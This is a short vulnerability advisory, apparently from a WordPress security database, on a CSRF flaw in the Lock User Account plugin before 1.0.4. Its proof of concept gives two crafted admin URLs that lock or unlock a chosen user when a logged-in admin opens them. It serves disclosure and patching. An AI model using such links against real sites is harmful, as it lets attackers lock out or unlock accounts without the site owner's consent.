WordPress Plugin Vulnerabilities

Lock User Account < 1.0.4 - Arbitrary Account Lock/Unlock via CSRF

Description

The plugin does not have CSRF check when bulk locking and unlocking accounts, which could allow attackers to make logged in admins lock and unlock arbitrary users via a CSRF attack

Proof of Concept

Make a logged in admin open one of the links below, this will make them lock/unlock the user with ID 5

https://example.com/wp-admin/users.php?action=lock&action2=lock&users%5B0%5D=5

https://example.com/wp-admin/users.php?action=unlock&action2=unlock&users%5B0%5D=5

Affects Plugins

Fixed in 1.0.4

References

Classification

Miscellaneous

Original Researcher
Dmitrii Ignatyev
Submitter
Dmitrii Ignatyev
Submitter website
Verified
Yes

Timeline

Publicly Published
2023-08-21 (about 8 months ago)
Added
2023-08-21 (about 8 months ago)
Last Updated
2024-01-26 (about 3 months ago)

Other